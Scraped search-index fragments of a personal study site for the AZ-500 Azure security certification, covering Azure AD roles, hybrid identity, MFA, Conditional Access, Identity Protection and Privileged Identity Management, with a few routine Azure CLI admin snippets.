Additionally, this role contains the ability to manage users and devices in order to associate policy and create and manage groups. This role can create and manage security groups, but doesn't have administrator rights over Microsoft 365 groups. That means administrators can't update owners or memberships of Microsoft 365 groups in the organization. However, they can manage the Microsoft 365 group they create, which is a part of their end-user privileges. So, any Microsoft 365 group (not security group) they create is counted against their quota of 250. Assign the Windows 365 Administrator role to users who need to do the following tasks: -Manage Windows 365 Cloud PCs in Microsoft Endpoint Manager -Enroll and manage devices in Azure AD, including assigning users and policies -Create and manage security groups, but not role-assignable groups -View basic properties in the Microsoft 365 admin center -Read usage reports in the Microsoft 365 admin center -Create and manage support tickets in Azure and the Microsoft 365 admin center Windows Update Deployment Administrator Users in this role can create and manage all aspects of Windows Update deployments through the Windows Update for Business deployment service. The deployment service enables users to define settings for when and how updates are deployed, and specify which updates are offered to groups of devices in their tenant. It also allows users to monitor the update progress. Yammer Administrator Assign the Yammer Administrator role to users who need to do the following tasks: -Manage\u00a0all aspects of Yammer -Create,\u00a0manage, and\u00a0restore\u00a0Microsoft 365 Groups, but not role-assignable groups -View the hidden members of Security groups and Microsoft 365 groups, including role assignable groups -Read usage reports\u00a0in the Microsoft 365 admin center -Create\u00a0and\u00a0manage\u00a0service requests in the Microsoft 365 admin center -View announcements\u00a0in the Message center, but not security announcements -View\u00a0service health","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#15-deploy-azure-active-directory-domain-services","title":"1.5. Deploy Azure Active Directory Domain Services","text":"

        Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

        Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign in to services and applications connected to the managed domain using their existing credentials.

When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name, such as aaddscontoso.com. Two Windows Server domain controllers (DCs) are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You can expand a managed domain to have more than one replica set per Azure AD tenant. Replica sets can be added to any peered virtual network in any Azure region that supports Azure AD DS. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

Azure AD DS replicates identity information from Azure AD, so it works with Azure AD tenants that are cloud-only or synchronized with an on-premises AD DS environment. Azure AD DS performs a one-way synchronization from Azure AD to provide access to a central set of users, groups, and credentials. You can create resources directly in the managed domain (Azure AD DS), but they aren't synchronized back to Azure AD.

        Concepts:

Azure Active Directory (Azure AD) - Cloud-based identity and mobile device management that provides user account and authentication services for resources such as Microsoft 365, the Azure portal, or SaaS applications.

        Azure AD can be synchronized with an on-premises AD DS environment to provide a single identity to users that works natively in the cloud.

Active Directory Domain Services (AD DS) - Enterprise-ready lightweight directory access protocol (LDAP) server that provides key features such as identity and authentication, computer object management, group policy, and trusts.

        AD DS is a central component in many organizations with an on-premises IT environment and provides core user account authentication and computer management features.

Azure Active Directory Domain Services (Azure AD DS) - Provides managed domain services with a subset of fully compatible traditional AD DS features such as domain join, group policy, LDAP, and Kerberos/New Technology LAN Manager (NTLM) authentication.

        Azure AD DS integrates with Azure AD, which can synchronize with an on-premises AD DS environment. This ability extends central identity use cases to traditional web applications that run in Azure as part of a lift-and-shift strategy.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#16-create-and-manage-azure-ad-users","title":"1.6. Create and manage Azure AD users","text":"

        Note for deleted users:

The user is deleted and no longer appears on the Users - All users page. The user can be seen on the Deleted users page for the next 30 days and can be restored during that time. When a user is deleted, any licenses consumed by the user are made available for other users.

        To update the identity, contact information, or job information for users whose source of authority is Windows Server Active Directory, you must use Windows Server Active Directory. After you complete the update, you must wait for the next synchronization cycle to complete before you see the changes.
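As a minimal sketch (not part of the course text), these lifecycle operations can be driven from the Azure CLI; the UPN, password, and object ID below are placeholders:

```bash
# Create a cloud-only user (values are placeholders)
az ad user create \
  --display-name "Test User" \
  --user-principal-name testuser@contoso.onmicrosoft.com \
  --password 'P@ssw0rd-ChangeMe!'

# Soft-delete the user; it stays restorable for 30 days
az ad user delete --id testuser@contoso.onmicrosoft.com

# List soft-deleted users, then restore one via Microsoft Graph
az rest --method GET \
  --url "https://graph.microsoft.com/v1.0/directory/deletedItems/microsoft.graph.user"
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/directory/deletedItems/<object-id>/restore"
```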

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#17-manage-users-with-azure-ad-groups","title":"1.7. Manage users with Azure AD groups","text":"

        Azure AD lets you use groups to manage access to applications, data, and resources. Resources can be:

        • Part of the Azure AD organization, such as permissions to manage objects through roles in Azure AD
        • External to the organization, such as for Software as a Service (SaaS) apps
        • Azure services
        • SharePoint sites
        • On-premises resources

There are two group types and three group membership types.

Group types:

• Security: Used to manage user and computer access to shared resources.
• Microsoft 365: Provides collaboration opportunities by giving group members access to a shared mailbox, calendar, files, SharePoint sites, and more.

        Membership types:

        • Assigned: Lets you add specific users as members of a group and have unique permissions.
• Dynamic user: Lets you use dynamic membership rules to automatically add and remove members. If a member's attributes change, the system checks your dynamic group rules for the directory to see if the member meets the rule requirements (is added) or no longer meets the rule requirements (is removed).
• Dynamic device: Lets you use dynamic group rules to automatically add and remove devices. If a device's attributes change, the system checks your dynamic group rules for the directory to see if the device meets the rule requirements (is added) or no longer meets the rule requirements (is removed).

You can create a dynamic group for either devices or users, but not for both. You can't create a device group based on the device owners' attributes. Device membership rules can only reference device attributes.
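A quick sketch of assigned-membership group management with the Azure CLI; the group name and member object ID are hypothetical. Dynamic membership rules aren't exposed by `az ad group` and would go through Microsoft Graph instead:

```bash
# Create a security group with assigned membership
az ad group create --display-name "SalesTeam" --mail-nickname "SalesTeam"

# Add a user to the group by object ID
az ad group member add --group "SalesTeam" --member-id <user-object-id>

# Dynamic membership (membershipRule / membershipRuleProcessingState)
# is configured via Microsoft Graph, not via `az ad group`.
```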

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#18-configure-azure-ad-administrative-units","title":"1.8. Configure Azure AD administrative units","text":"

        An administrative unit can contain only users and groups. Administrative units restrict permissions in a role to any portion of your organization that you define. You could, for example, use administrative units to delegate the Helpdesk Administrator role to regional support specialists.

        To use administrative units, you need an Azure Active Directory Premium license for each administrative unit admin, and Azure Active Directory Free licenses for administrative unit members.
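There is no dedicated `az` command group for administrative units, but as a hedged sketch they can be managed through Microsoft Graph with `az rest`; the display name and IDs below are placeholders:

```bash
# Create an administrative unit via Microsoft Graph
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/directory/administrativeUnits" \
  --body '{"displayName": "West Region Helpdesk"}'

# Add an existing user as a member of the administrative unit
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/directory/administrativeUnits/<au-id>/members/\$ref" \
  --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/<user-object-id>"}'
```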

        Available roles for Azure AD administrative units

| Role | Description |
| --- | --- |
| Authentication Administrator | Has access to view, set, and reset authentication method information for any non-admin user in the assigned administrative unit only. |
| Groups Administrator | Can manage all aspects of groups and group settings, such as naming and expiration policies, in the assigned administrative unit only. |
| Helpdesk Administrator | Can reset passwords for non-administrators and Helpdesk Administrators in the assigned administrative unit only. |
| License Administrator | Can assign, remove, and update license assignments within the administrative unit only. |
| Password Administrator | Can reset passwords for non-administrators and Password Administrators within the assigned administrative unit only. |
| User Administrator | Can manage all aspects of users and groups, including resetting passwords for limited admins, within the assigned administrative unit only. |

## 1.9. Passwordless authentication

Microsoft global Azure and Azure Government offer the following three passwordless authentication options that integrate with Azure Active Directory (Azure AD):

        1. Windows Hello for Business: Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.
        2. Microsoft Authenticator: You can also allow your employee's phone to become a passwordless authentication method. You may already be using the Authenticator app as a convenient multi-factor authentication option in addition to a password. You can also use the Authenticator App as a passwordless option.
3. Fast Identity Online 2 (FIDO2) security keys: The FIDO (Fast IDentity Online) Alliance helps promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard and incorporates the web authentication (WebAuthn) standard. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices, but could also use Bluetooth or Near-Field Communication (NFC).
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#2-implement-hybrid-identity","title":"2. Implement Hybrid Identity","text":"

        Hybrid Identity is the process of connecting your on-premises Active Directory with your Azure Active Directory.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#21-deploy-azure-ad-connect","title":"2.1. Deploy Azure AD connect","text":"

        Azure AD Connect will integrate your on-premises directories with Azure Active Directory.

        Azure AD Connect provides the following features:

• Password hash synchronization. A sign-in method that synchronizes a hash of a user's on-premises AD password with Azure AD.
        • Pass-through authentication. A sign-in method that allows users to use the same password on-premises and in the cloud, but doesn't require the additional infrastructure of a federated environment.
        • Federation integration. Federation is an optional part of Azure AD Connect and can be used to configure a hybrid environment using an on-premises AD FS infrastructure. It also provides AD FS management capabilities such as certificate renewal and additional AD FS server deployments.
• Synchronization. Responsible for creating users, groups, and other objects, and for making sure identity information for your on-premises users and groups matches the cloud. This synchronization also includes password hashes.
        • Health Monitoring. Azure AD Connect Health can provide robust monitoring and provide a central location in the Azure portal to view this activity.

Azure Active Directory (Azure AD) Connect Health provides robust monitoring of your on-premises identity infrastructure. It enables you to maintain a reliable connection to Microsoft 365 and Microsoft Online Services. With Azure AD Connect Health, the key data you need is easily accessible: you can view and act on alerts, set up email notifications for critical alerts, and view performance data. Azure AD Connect Health works by installing an agent on each of your on-premises sync servers.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#23-introduction-to-authentication","title":"2.3 Introduction to Authentication","text":"

Identity is the new control plane of IT security. When the Azure AD hybrid identity solution is your new control plane, authentication is the foundation of cloud access. All the other advanced security and user-experience features in Azure AD depend on your authentication method.

        Azure AD supports the following authentication methods for hybrid identity solutions:

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#cloud-authentication","title":"Cloud authentication","text":"

Azure AD handles users' sign-in process. Coupled with seamless single sign-on (SSO), users can sign in to cloud apps without having to reenter their credentials.

        Option 1: Azure AD password hash synchronization.\u00a0The simplest way to enable authentication for on-premises directory objects in Azure AD.

        Option 2: Azure AD Pass-through Authentication.\u00a0Provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. The servers validate the users directly with your on-premises Active Directory, which ensures that the password validation doesn't happen in the cloud. Companies with a security requirement to immediately enforce on-premises user account states, password policies, and sign-in hours might use this authentication method.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#federal-authentication","title":"Federal authentication","text":"

Azure AD hands off the authentication process to a separate trusted authentication system, such as on-premises Active Directory Federation Services (AD FS), to validate the user's password. The authentication system can provide additional advanced authentication requirements. Examples are smartcard-based authentication or third-party multifactor authentication.

So, which one is more appropriate for your organization? See this decision tree:

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#24-azure-ad-password-hash-synchronization-phs","title":"2.4. Azure AD Password Hash Synchronization (PHS)","text":"

Password hash synchronization (PHS) is a feature used to synchronize user passwords from an on-premises Active Directory instance to a cloud-based Azure AD instance. Use this feature to sign in to Azure AD services like Microsoft 365, Microsoft Intune, CRM Online, and Azure Active Directory Domain Services (Azure AD DS). You sign in to the service by using the same password you use to sign in to your on-premises Active Directory instance.

How does synchronization work? In the background, the password synchronization component takes the user's password hash from on-premises Active Directory, encrypts it, and passes it as a string to Azure. Azure decrypts the encrypted hash and stores the password hash as a user attribute in Azure AD. When the user signs in to an Azure service, the sign-in challenge dialog box generates a hash of the user's password and passes that hash back to Azure. Azure then compares the hash with the one in that user's account. If the two hashes match, the two passwords must also match, and the user receives access to the resource. The dialog box provides the facility to save the credentials so that the next time the user accesses the Azure resource, the user will not be prompted.

It is important to understand that this is same sign-in, not single sign-on. The user still authenticates against two separate directory services, albeit with the same user name and password. This solution provides a simple alternative to an AD FS implementation.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#25-azure-ad-pass-through-authentication-pta","title":"2.5. Azure AD Pass-through Authentication (PTA)","text":"

Azure AD Pass-through Authentication (PTA) allows users to sign in to both on-premises and cloud-based applications using the same user account and password. When users sign in using Azure AD, Pass-through Authentication validates the users' passwords directly against an organization's on-premises Active Directory. Benefits:

        • Supports user sign-in into all web browser-based applications and into Microsoft Office client applications that use modern authentication.
        • Sign-in usernames can be either the on-premises default username (userPrincipalName) or another attribute configured in Azure AD Connect (known as Alternate ID).
        • Works seamlessly with conditional access features such as Azure Active Directory Multi-Factor Authentication to help secure your users.
        • Integrated with cloud-based self-service password management, including password writeback to on-premises Active Directory and password protection by banning commonly used passwords.
        • Multi-forest environments are supported if there are forest trusts between your AD forests and if name suffix routing is correctly configured.
        • PTA is a free feature, and you don't need any paid editions of Azure AD to use it.
        • PTA can be enabled via Azure AD Connect.
        • PTA uses a lightweight on-premises agent that listens for and responds to password validation requests.
        • Installing multiple agents provides high availability of sign-in requests.
        • PTA protects your on-premises accounts against brute force password attacks in the cloud.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#26-azure-ad-federation","title":"2.6. Azure AD Federation","text":"

        Federation is a collection of domains that have established trust. The level of trust may vary, but typically includes authentication and almost always includes authorization. A typical federation might include a number of organizations that have established trust for shared access to a set of resources. You can federate your on-premises environment with Azure AD and use this federation for authentication and authorization. This sign-in method ensures that all user authentication occurs on-premises. This method allows administrators to implement more rigorous levels of access control.

        If you decide to use Federation with Active Directory Federation Services (AD FS), you can optionally set up password hash synchronization as a backup in case your AD FS infrastructure fails.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#27-configure-password-writeback","title":"2.7. Configure password writeback","text":"

Password writeback is a feature enabled with Azure AD Connect that allows password changes in the cloud to be written back to an existing on-premises directory in real time.

To use self-service password reset (SSPR), you must have already configured Azure AD Connect in your environment.

        Password writeback provides:

        • Enforcement of on-premises Active Directory Domain Services password policies. When a user resets their password, it is checked to ensure it meets your on-premises Active Directory Domain Services policy before committing it to that directory. This review includes checking the history, complexity, age, password filters, and any other password restrictions that you have defined in local Active Directory Domain Services.
        • Zero-delay feedback. Password writeback is a synchronous operation. Your users are notified immediately if their password did not meet the policy or could not be reset or changed for any reason.
        • Supports password changes from the access panel and Microsoft 365. When federated or password hash synchronized users come to change their expired or non-expired passwords, those passwords are written back to your local Active Directory Domain Services environment.
• Supports password writeback when an admin resets a password from the Azure portal. Whenever an admin resets a user's password in the Azure portal, if that user is federated or password hash synchronized, the password is written back to on-premises. This functionality is currently not supported in the Office admin portal.
• Doesn't require any inbound firewall rules. Password writeback uses an Azure Service Bus relay as an underlying communication channel. All communication is outbound over port 443.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#3-microsoft-entra-id-protection-identity-protection","title":"3. Microsoft Entra ID Protection (Identity Protection)","text":"

Risk detections in Azure AD Identity Protection include any identified suspicious actions related to user accounts in the directory. The signals fed to Identity Protection can be passed on to tools like Conditional Access to make access decisions, or sent to a security information and event management (SIEM) tool for further investigation based on your organization's enforced policies.

To protect your organization, you can use:

        • Azure AD Identity Protection policies can automatically block a sign-in attempt or require additional action, such as requiring a password change or prompt for Azure AD Multi-Factor Authentication.
        • These policies work with existing Azure AD Conditional Access policies as an extra layer of protection for your organization.

        Some of the following actions may trigger Azure AD Identity Protection risk detection:

        • Users with leaked credentials.
        • Sign-ins from anonymous IP addresses.
        • Impossible travel to atypical locations.
        • Sign-ins from infected devices.
        • Sign-ins from IP addresses with suspicious activity.

        Azure Active Directory Identity Protection includes three default policies that administrators can choose to enable:

The insight you get for a detected risk is tied to your Azure AD subscription.

• MFA registration policy - Identity Protection can help organizations roll out Azure AD Multi-Factor Authentication using a Conditional Access policy requiring registration at sign-in. It makes sure users are registered for Azure AD Multi-Factor Authentication. If a sign-in risk policy prompts for MFA, the user must already be registered for Azure AD Multi-Factor Authentication.
• Sign-in risk policy - Identity Protection analyzes signals from each sign-in, both real-time and offline, and calculates a risk score based on the probability that the sign-in wasn't performed by the user. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require multi-factor authentication. Administrators can also choose to create a custom Conditional Access policy, including sign-in risk as an assignment condition.
• User risk policy - Identifies and responds to user accounts that may have compromised credentials. Can prompt the user to create a new password.

When you enable a user risk or sign-in risk policy, you can also choose the threshold for risk level: low and above, medium and above, or high. This flexibility lets you decide how aggressive you want to be in enforcing controls for suspicious sign-in events.
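Assuming you hold the relevant Microsoft Graph permissions (e.g. IdentityRiskEvent.Read.All and IdentityRiskyUser.Read.All), a hedged sketch for inspecting risk data from the CLI:

```bash
# List recent risk detections
az rest --method GET \
  --url "https://graph.microsoft.com/v1.0/identityProtection/riskDetections?\$top=10"

# List users currently flagged as at risk
az rest --method GET \
  --url "https://graph.microsoft.com/v1.0/identityProtection/riskyUsers?\$filter=riskState eq 'atRisk'"
```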

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#31-implement-user-risk-policy","title":"3.1. Implement user risk policy","text":"

        Identity Protection can calculate what it believes is normal for a user's behavior and use that to base decisions for their risk. User risk is a calculation of probability that an identity has been compromised. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require a password change using Azure AD self-service password reset.

The risky users report includes this data:

        • Which users are at risk, have had risk remediated, or have had risk dismissed?
        • Details about detections
        • History of all risky sign-ins
        • Risk history

Administrators can then act on these events; a hedged Graph sketch follows this list. They can choose to:

        • Reset the user password
        • Confirm user compromise
        • Dismiss user risk
        • Block user from signing in
        • Investigate further using Azure ATP
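A sketch of the confirm/dismiss actions via Microsoft Graph (object IDs are placeholders; this assumes IdentityRiskyUser.ReadWrite.All):

```bash
# Confirm a user as compromised (raises their risk level to high)
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/identityProtection/riskyUsers/confirmCompromised" \
  --body '{"userIds": ["<user-object-id>"]}'

# Or dismiss the risk instead
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/identityProtection/riskyUsers/dismiss" \
  --body '{"userIds": ["<user-object-id>"]}'
```
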
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#32-implement-sign-in-risk-policy","title":"3.2. Implement sign-in risk policy","text":"

        Sign-in risk represents the probability that a given authentication request isn't authorized by the identity owner. For users of Azure Identity Protection, sign-in risk can be evaluated as part of a Conditional Access policy. Sign-in Risk Policy supports the following conditions:

• Location: When configuring location as a condition, organizations can choose to include or exclude locations. These named locations may include the public IPv4 network information, country or region, or even unknown areas that don't map to specific countries or regions.
        • Client apps: Conditional Access policies by default apply to browser-based applications and applications that utilize modern authentication protocols. In addition to these applications, administrators can choose to include Exchange ActiveSync clients and other clients that utilize legacy protocols.
• Risky sign-ins: The risky sign-ins report contains filterable data for up to the past 30 days (1 month); a CLI sketch for pulling this report follows the list. With the information provided by the risky sign-ins report, administrators can find:
          • Which sign-ins are classified as at risk, confirmed compromised, confirmed safe, dismissed, or remediated.
          • Real-time and aggregate risk levels associated with sign-in attempts.
          • Detection types triggered.
          • Conditional Access policies applied
          • MFA details
          • Device information
          • Application information
          • Location information

Administrators can then take action on these events. They can choose to:

        • Confirm sign-in compromise
        • Confirm sign-in safe
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#33-deploy-multifactor-authentication-in-azure","title":"3.3. Deploy multifactor authentication in Azure","text":"

For organizations that need to be compliant with industry standards, such as the Payment Card Industry (PCI) Data Security Standard (DSS) version 3.2, MFA is a must-have capability for authenticating users. Beyond compliance with industry standards, enforcing MFA can also help organizations mitigate credential theft attacks.

        Methods

Call to phone: Places an automated voice call. The user answers the call and presses # on the phone keypad to authenticate. The phone number is not synchronized to on-premises Active Directory. A voice call is important because it persists through a phone handset upgrade, allowing the user to register the mobile app on the new device.

        Text message to phone: Sends a text message that contains a verification code. The user is prompted to enter the verification code into the sign-in interface. This process is called one-way SMS. Two-way SMS means that the user must text back a particular code. Two-way SMS is deprecated and not supported after November 14, 2018. Users who are configured for two-way SMS are automatically switched to call to phone verification at that time.

        Notification through mobile app: Sends a push notification to your phone or registered device. The user views the notification and selects Approve to complete verification. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Push notifications through the mobile app provide the best user experience.

        Verification code from mobile app: The Microsoft Authenticator app generates a new OATH verification code every 30 seconds. The user enters the verification code into the sign-in interface. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Verification code from mobile app can be used when the phone has no data connection or cellular signal.

        Settings

• Account lockout: The account lockout settings let you specify how many failed attempts to allow before the account becomes locked out for a period of time. The account lockout settings are only applied when a PIN code is entered for the MFA prompt. The following settings are available: number of MFA denials to trigger account lockout, minutes until the account lockout counter is reset, and minutes until the account is automatically unblocked.
        • Block and unblock users: If a user's device has been lost or stolen, you can block authentication attempts for the associated account.
        • Fraud alerts: Configure the fraud alert feature so that your users can report fraudulent attempts to access their resources. Code to report fraud during initial greeting: When users receive a phone call to perform two-step verification, they normally press # to confirm their sign-in. To report fraud, the user enters a code before pressing #. This code is 0 by default, but you can customize it.
        • Notification: Email notifications can be configured when users report fraud alerts.
        • OATH tokens: Azure AD supports the use of OATH-TOTP SHA-1 tokens that refresh codes every 30 or 60 seconds. Customers can purchase these tokens from the vendor of their choice.
• Trusted IPs: Trusted IPs is a feature to allow federated users or IP address ranges to bypass two-step authentication. There are two selections:
          • Managed tenants. For managed tenants, you can specify IP ranges that can skip MFA.
          • Federated tenants. For federated tenants, you can specify IP ranges and you can also exempt AD FS claims users.

        How to deploy MFA

To enable MFA, go to the User Properties in Azure Active Directory, and then the Multi-Factor Authentication option. From there, you can select the users that you want to modify and enable for MFA. You can also bulk-enable groups of users with PowerShell. User states can be Enabled, Enforced, or Disabled.

        Azure AD Multi-Factor Authentication is included free of charge for global administrator security. Enabling MFA for global administrators provides an added level of security when managing and creating Azure resources like virtual machines, managing storage, or using other Azure services. Secondary authentication includes phone call, text message, and the authenticator app. Remember, you can only enable MFA for organizational accounts stored in Azure Active Directory. These are also called work or school accounts.
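Per-user MFA states are managed in the legacy portal or, as noted earlier, with the MSOnline PowerShell cmdlets. As a CLI-side sketch, you can at least inspect which methods a user has registered via Microsoft Graph (the object ID is a placeholder; this assumes UserAuthenticationMethod.Read.All):

```bash
# Inspect which authentication methods a user has registered
az rest --method GET \
  --url "https://graph.microsoft.com/v1.0/users/<user-object-id>/authentication/methods"
```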

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#34-azure-ad-conditional-access","title":"3.4. Azure AD Conditional Access","text":"

Conditional Access is the tool used by Azure Active Directory to bring signals together, make decisions, and enforce organizational policies. Conditional Access policies at their simplest are if-then statements: if a user wants to access a resource, then they must complete an action. Conditional Access policies are enforced after the first-factor authentication has been completed. Conditional Access is not intended as an organization's first line of defense for scenarios like denial-of-service (DoS) attacks, but it can use signals from these events to determine access.

Conditional Access is at the heart of the new identity-driven control plane: Identity as a Service.

        Conditional access comes with six conditions: user/group, cloud application, device state, location (IP range), client application, and sign-in risk.

With access controls, you can either Block Access altogether or Grant Access with more requirements (a hedged Graph sketch follows this list):

        • Require MFA from Azure AD or an on-premises MFA (combined with AD FS).
        • Grant access to only trusted devices.
        • Require a domain-joined device.
        • Require mobile devices to use Intune app protection policies.
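A hedged sketch of creating such a policy through Microsoft Graph; it is deliberately created in report-only mode so nothing is enforced, and the display name is hypothetical:

```bash
# Create a report-only policy requiring MFA for all users on all cloud apps
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies" \
  --body '{
    "displayName": "Require MFA - sketch",
    "state": "enabledForReportingButNotEnforced",
    "conditions": {
      "users": { "includeUsers": ["All"] },
      "applications": { "includeApplications": ["All"] }
    },
    "grantControls": {
      "operator": "OR",
      "builtInControls": ["mfa"]
    }
  }'
```

Report-only mode lets you observe the policy's impact in the sign-in logs before flipping `state` to `enabled`.
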
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#35-azure-active-directory-azure-ad-access-reviews","title":"3.5. Azure Active Directory (Azure AD) access reviews","text":"

Navigate to Azure Active Directory (or Microsoft Entra ID) > Identity Governance. Select Access reviews.

        Azure Active Directory (Azure AD) access reviews enable organizations to efficiently manage group memberships, access to enterprise applications, and role assignments.

Use access reviews in the following cases (a CLI sketch for listing review definitions follows the list):

        • Too many users in privileged roles: It's a good idea to check how many users have administrative access, how many of them are Global Administrators, and if there are any invited guests or partners that have not been removed after being assigned to do an administrative task. You can recertify the role assignment users in Azure AD roles such as Global Administrators, or Azure resources roles such as User Access Administrator in the Azure AD Privileged Identity Management (PIM) experience.
        • When automation is infeasible: You can create rules for dynamic membership on security groups or Microsoft 365 Groups, but what if the HR data is not in Azure AD or if users still need access after leaving the group to train their replacement? You can then create a review on that group to ensure those who still need access should have continued access.
• When a group is used for a new purpose: If you have a group that is going to be synced to Azure AD, or if you plan to enable a sales management application for everyone in the Sales team group, it would be useful to ask the group owner to review the group membership prior to the group being used in a different risk context.
        • Business critical data access: for certain resources, it might be required to ask people outside of IT to regularly sign out and give a justification on why they need access for auditing purposes.
        • To maintain a policy's exception list: In an ideal world, all users would follow the access policies to secure access to your organization's resources. However, sometimes there are business cases that require you to make exceptions. As the IT admin, you can manage this task, avoid oversight of policy exceptions, and provide auditors with proof that these exceptions are reviewed regularly.
        • Ask group owners to confirm they still need guests in their groups: Employee access might be automated with some on premises IAM, but not invited guests. If a group gives guests access to business sensitive content, then it's the group owner's responsibility to confirm the guests still have a legitimate business need for access.
        • Have reviews recur periodically: You can set up recurring access reviews of users at set frequencies such as weekly, monthly, quarterly or annually, and the reviewers will be notified at the start of each review. Reviewers can approve or deny access with a friendly interface and with the help of smart recommendations.
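The CLI sketch promised above, assuming the AccessReview.Read.All Graph permission; it simply lists the configured review definitions:

```bash
# List access review definitions in the tenant
az rest --method GET \
  --url "https://graph.microsoft.com/v1.0/identityGovernance/accessReviews/definitions"
```
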
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#4-microsoft-entra-privileged-identity-management-pim","title":"4. Microsoft Entra Privileged Identity Management (PIM)","text":"

        Using this feature requires Azure AD Premium P2 licenses. Azure AD Privileged Identity Management (PIM) allows you to manage, control, and monitor access to the most important resources in your organization. You can give just-in-time access and just-enough-access to users to allow them to do their tasks. Privileged Identity Management provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources you care about. Here are some of the key features of Privileged Identity Management:

        • Provide just-in-time privileged access to Azure AD and Azure resources
        • Assign time-bound access to resources using start and end dates
        • Require approval to activate privileged roles
        • Enforce multi-factor authentication to activate any role
        • Use justification to understand why users activate
        • Get notifications when privileged roles are activated
        • Conduct access reviews to ensure users still need roles
        • Download audit history for internal or external audit
        • Prevents removal of the last active Global Administrator and Privileged Role Administrator role assignments

        Zero Trust model principles:

• Verify explicitly - Always authenticate and authorize based on all available data points.
• Use least privilege access - Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection.
• Assume breach - Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.

        Zero Trust model Architecture:

        The primary components of this process are Intune for device management and device security policy configuration, Azure AD conditional access for device health validation, and Azure AD for user and device inventory. The system works with Intune, pushing device configuration requirements to the managed devices. The device then generates a statement of health, which is stored in Azure AD. When the device user requests access to a resource, the device health state is verified as part of the authentication exchange with Azure AD.

        How does Privileged Identity Management work?

Once you set up Privileged Identity Management, you'll see Tasks, Manage, and Activity options in the left navigation menu. As an administrator, you'll choose between options such as managing Azure AD roles, managing Azure resource roles, or PIM for Groups. When you choose what you want to manage, you see the appropriate set of options for that choice.

        Azure AD roles:

• Can manage Azure AD roles: Privileged Role Administrator and Global Administrator roles.
• Can read Azure AD roles: Global Administrator, Security Administrator, Global Reader, and Security Reader roles.

Azure resource roles:

• Can be managed by: Subscription Administrator, Resource Owner, and Resource User Access Administrator roles.
• Cannot be read by: Privileged Role Administrator, Security Administrator, or Security Reader roles.

        Make sure there are always at least two users in a Privileged Role Administrator role, in case one user is locked out or their account is deleted.

When creating an assignment, something I didn't know when setting it up: the type of the assignment.

• Eligible assignments require the member of the role to perform an action to use the role. Actions might include activation or requesting approval from designated approvers.
• Active assignments don't require the member to perform any action to use the role. Members assigned as active have the privileges assigned to the role.

